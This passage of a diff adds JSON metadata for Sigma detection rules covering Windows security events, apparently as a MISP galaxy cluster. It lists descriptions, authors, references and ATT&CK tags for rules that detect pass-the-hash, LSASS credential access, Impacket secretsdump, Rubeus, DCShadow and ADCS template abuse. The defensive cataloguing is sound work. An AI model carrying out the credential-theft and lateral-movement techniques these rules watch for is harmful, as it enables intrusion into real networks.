"attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "cd0f7229-d16f-42de-8fe3-fba365fbcb3a", + "value": "Invoke-Obfuscation Via Use Rundll32 - Security" + }, + { + "description": "Detects a user log-off activity. 
Could be used for example to correlate information during forensic investigations", + "meta": { + "author": "frack113", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_user_logoff.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4634", + "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4647", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_logoff.yml" + ], + "tags": "No established tags" + }, + "uuid": "0badd08f-c6a3-4630-90d3-6875cca440be", + "value": "User Logoff Event" + }, + { + "description": "Detects access to $ADMIN share", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/04", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "win_security_admin_share_access.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_share_access.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "098d7118-55bc-4912-a836-dc6483a8d150", + "value": "Access to ADMIN$ Share" + }, + { + "description": "Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.", + "meta": { + "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2020/05/11", + "falsepositive": [ + "Exclude known DCs." 
+ ], + "filename": "win_security_global_catalog_enumeration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_global_catalog_enumeration.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.002" + ] + }, + "uuid": "619b020f-0fd7-4f23-87db-3f51ef837a34", + "value": "Enumeration via the Global Catalog" + }, + { + "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", + "meta": { + "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "creation_date": "2019/06/14", + "falsepositive": [ + "Administrator activity" + ], + "filename": "win_security_pass_the_hash_2.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", + "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", + "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1550.002" + ] + }, + "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", + "value": "Pass the Hash Activity 2" + }, + { + "description": "Detects renaming of file while deletion with SDelete tool.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/14", + "falsepositive": [ + "Legitimate usage of SDelete" + ], + "filename": "win_security_susp_sdelete.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" + ], + "tags": [ + "attack.impact", + "attack.defense_evasion", + "attack.t1070.004", + "attack.t1027.005", + "attack.t1485", + "attack.t1553.002", + "attack.s0195" + ] + }, + "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "value": "Secure Deletion with SDelete" + }, + { + "description": "Detects logon events that specify new credentials", + "meta": { + "author": "Max Altgelt", + "creation_date": "2022/04/06", + "falsepositive": [ + "Legitimate remote administration activity" + ], + "filename": "win_security_susp_logon_newcredentials.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml" + ], + "tags": "No established tags" + }, + "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", + "value": "Outgoing Logon with New Credentials" + }, + { + "description": "Detects certificate creation with template allowing risk permission subject", + "meta": { + "author": "Orlinum , BlueDefenZer", + "creation_date": "2021/11/17", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "filename": "win_security_adcs_certificate_template_configuration_vulnerability.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "5ee3a654-372f-11ec-8d3d-0242ac130003", + "value": "ADCS Certificate Template Configuration Vulnerability" + }, + { + "description": "Detects potential use of Rubeus via registered new trusted logon process", + "meta": { + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_register_new_logon_process_by_rubeus.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" + ] + }, + "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", + "value": "Register new Logon Process by Rubeus" + }, + { + "description": "Detects activity mentioned in Operation Wocao report", + "meta": { + "author": "Florian Roth, frack113", + "creation_date": "2019/12/20", + "falsepositive": [ + "Administrators that use checkadmin.exe tool to enumerate local administrators" + ], + "filename": "win_security_apt_wocao.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1207671369963646976", + "https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_wocao.yml" + ], + 
"tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", + "attack.execution", + "attack.t1053.005", + "attack.t1059.001" + ] + }, + "uuid": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", + "value": "Operation Wocao Activity - Security" + }, + { + "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", + "meta": { + "author": "OTR (Open Threat Research)", + "creation_date": "2018/11/28", + "falsepositive": [ + "Domain Controllers acting as printer servers too? :)" + ], + "filename": "win_security_dce_rpc_smb_spoolss_named_pipe.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", + "https://twitter.com/_dirkjan/status/1309214379003588608", + "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dce_rpc_smb_spoolss_named_pipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "214e8f95-100a-4e04-bb31-ef6cba8ce07e", + "value": "DCERPC SMB Spoolss Named Pipe" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_invoke_obfuscation_via_stdin_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "80b708f3-d034-40e4-a6c8-d23b7a7db3d1", + "value": "Invoke-Obfuscation Via Stdin - Security" + }, + { + "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", + "meta": { + "author": "Bartlomiej Czyz, Relativity", + "creation_date": "2021/01/21", + "falsepositive": [ + "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + ], + "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://bczyz1.github.io/2021/01/30/psexec.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1570", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "value": "Metasploit Or Impacket Service Installation Via SMB PsExec" + }, + { + "description": "Detects WRITE_DAC access to a domain object", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_ad_object_writedac_access.yml", + "level": "critical", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_object_writedac_access.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "value": "AD Object WriteDAC 
Access" + }, + { + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/10", + "falsepositive": [ + "Faulty legacy applications" + ], + "filename": "win_security_susp_kerberos_manipulation.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", + "value": "Kerberos Manipulation" + }, + { + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "meta": { + "author": "Samir Bousseaden", + "creation_date": "2019/04/03", + "falsepositive": [ + "Update the excluded named pipe to filter out any newly observed legit named pipe" + ], + "filename": "win_security_lm_namedpipe.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/menasec1/status/1104489274387451904", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lm_namedpipe.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002" + ] + }, + "uuid": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", + "value": "First Time Seen Remote Named Pipe" + }, + { + "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", + "meta": { + "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "creation_date": "2019/11/08", + "falsepositive": [ + "Unknown" + ], + "filename": 
"win_security_invoke_obfuscation_obfuscated_iex_services_security.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "value": "Invoke-Obfuscation Obfuscated IEX Invocation - Security" + }, + { + "description": "Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges.\nSigma detects\nEvent ID 4728 indicates a ‘Member is added to a Security Group’.\nEvent ID 4729 indicates a ‘Member is removed from a Security enabled-group’ .\nEvent ID 4730 indicates a ‘Security Group is deleted’.\nThe case is not applicable for Unix OS.\nSupported OS - Windows 2008 R2 and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_group_modification_logging.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730", + 
"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_group_modification_logging.yml" + ], + "tags": "No established tags" + }, + "uuid": "9cf01b6c-e723-4841-a868-6d7f8245ca6e", + "value": "Group Modification Logging" + }, + { + "description": "Transferring files with well-known filenames (sensitive files with credential data) using network shares", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Transferring sensitive files for legitimate administration work by legitimate administrator" + ], + "filename": "win_security_transf_files_with_cred_data_via_network_shares.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_transf_files_with_cred_data_via_network_shares.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.001", + "attack.t1003.003" + ] + }, + "uuid": "910ab938-668b-401b-b08c-b596e80fdca5", + "value": "Transferring Files with Credential Data via Network Shares" + }, + { + "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", + "meta": { + "author": "@SBousseaden, Florian Roth", + "creation_date": "2022/04/27", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_susp_krbrelayup.yml", + 
"level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", + "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "value": "KrbRelayUp Attack Pattern" + }, + { + "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/09/12", + "falsepositive": [ + "Legitimate use of remote PowerShell execution" + ], + "filename": "win_security_remote_powershell_session.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", + "value": "Remote PowerShell Sessions Network Connections (WinRM)" + }, + { + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "meta": { + "author": "xknow @xknow_infosec", + "creation_date": "2019/03/24", + "falsepositive": [ + "Companies, who may use these default LDAP-Attributes for personal information" + ], + "filename": "win_security_susp_ldap_dataexchange.yml", + 
"level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", + "https://github.com/fox-it/LDAPFragger", + "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" + ], + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ] + }, + "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "value": "Suspicious LDAP-Attributes Used" + }, + { + "description": "Detects a source user failing to authenticate with multiple users using explicit credentials on a host.", + "meta": { + "author": "Mauricio Velazco", + "creation_date": "2021/06/01", + "falsepositive": [ + "Terminal servers", + "Jump servers", + "Other multiuser systems like Citrix server farms", + "Workstations with frequently changing users" + ], + "filename": "win_security_susp_failed_logons_explicit_credentials.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_explicit_credentials.yml" + ], + "tags": [ + "attack.t1110.003", + "attack.initial_access", + "attack.privilege_escalation" + ] + }, + "uuid": "196a29c2-e378-48d8-ba07-8a9e61f7fab9", + "value": "Multiple Users Attempting To Authenticate Using Explicit Credentials" + }, + { + "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": 
"win_security_lsass_access_non_system_account.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_lsass_access_non_system_account.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", + "value": "LSASS Access from Non System Account" + }, + { + "description": "Detect AD credential dumping using impacket secretdump HKTL", + "meta": { + "author": "Samir Bousseaden, wagga", + "creation_date": "2019/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_impacket_secretdump.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.003" + ] + }, + "uuid": "252902e3-5830-4cf6-bf21-c22083dfd5cf", + "value": "Possible Impacket SecretDump Remote Activity" + }, + { + "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", + "meta": { + "author": "Orlinum , BlueDefenZer", + "creation_date": "2021/11/17", + "falsepositive": [ + "Administrator activity", + "Proxy SSL certificate with subject modification", + "Smart card enrollement" + ], + "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access" + ] + }, + "uuid": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "value": "ADCS Certificate Template Configuration Vulnerability with Risky EKU" + }, + { + "description": "Detects DCShadow via create new SPN", + "meta": { + "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", + "creation_date": "2019/10/25", + "falsepositive": [ + "Valid on domain controllers; exclude known DCs" + ], + "filename": "win_security_possible_dc_shadow.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", + "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", + "https://twitter.com/gentilkiwi/status/1003236624925413376", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1207" + ] + }, + "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", + "value": "Possible DC Shadow Attack" + }, + { + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_dpapi_domain_backupkey_extraction.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" + ], + "tags": [ + "attack.credential_access", + 
"attack.t1003.004" + ] + }, + "uuid": "4ac1f50b-3bd0-4968-902d-868b4647937e", + "value": "DPAPI Domain Backup Key Extraction" + }, + { + "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", + "meta": { + "author": "David Strassegger, Tim Shelton", + "creation_date": "2021/01/22", + "falsepositive": [ + "Software installation" + ], + "filename": "win_security_scheduled_task_deletion.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", + "https://twitter.com/matthewdunwoody/status/1352356685982146562", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "car.2013-08-001", + "attack.t1053.005" + ] + }, + "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", + "value": "Scheduled Task Deletion" + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + 
"attack.t1021.002" + ] + }, + "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", + "value": "T1047 Wmiprvse Wbemcomn DLL Hijack" + }, + { + "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", + "meta": { + "author": "@neu5ron", + "creation_date": "2019/02/05", + "falsepositive": [ + "HyperV or other virtualization technologies with binary not listed in filter portion of detection" + ], + "filename": "win_security_susp_time_modification.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", + "Live environment caused by malware", + "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", + "value": "Unauthorized System Time Modification" + }, + { + "description": "Detects NetNTLM downgrade attack", + "meta": { + "author": "Florian Roth, wagga", + "creation_date": "2018/03/20", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_net_ntlm_downgrade.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" + ] + }, + "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "value": "NetNTLM Downgrade Attack" + }, + { + "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", + "meta": { + 
"author": "NVISO", + "creation_date": "2020/05/06", + "falsepositive": [ + "Legitimate logon attempts over the internet", + "IPv4-to-IPv6 mapped IPs" + ], + "filename": "win_security_susp_failed_logon_source.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml" + ], + "tags": [ + "attack.initial_access", + "attack.persistence", + "attack.t1078", + "attack.t1190", + "attack.t1133" + ] + }, + "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", + "value": "Failed Logon From Public IP" + }, + { + "description": "Detects the registration of the security event source VSSAudit. It would usually trigger when volume shadow copy operations happen.", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "creation_date": "2020/10/20", + "falsepositive": [ + "Legitimate use of VSSVC. Maybe backup operations. It would usually be done by C:\\Windows\\System32\\VSSVC.exe." 
+ ], + "filename": "win_security_vssaudit_secevent_source_registration.yml", + "level": "informational", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_vssaudit_secevent_source_registration.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "e9faba72-4974-4ab2-a4c5-46e25ad59e9b", + "value": "VSSAudit Security Event Source Registration" + }, + { + "description": "RDP login with localhost source address may be a tunnelled login", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2019/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "win_security_rdp_localhost_login.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml" + ], + "tags": [ + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" + ] + }, + "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", + "value": "RDP Login from Localhost" + }, + { + "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. 
Attackers may change the password to gain persistence.", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Initial installation of a domain controller" + ], + "filename": "win_security_susp_dsrm_password_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=1714", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", + "value": "Password Change on Directory Service Restore Mode (DSRM) Account" + }, + { + "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n\"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.\n", + "meta": { + "author": "Dimitrios Slamaris", + "creation_date": "2017/06/09", + "falsepositive": "No established falsepositives", + "filename": "win_security_susp_samr_pwset.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_samr_pwset.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": 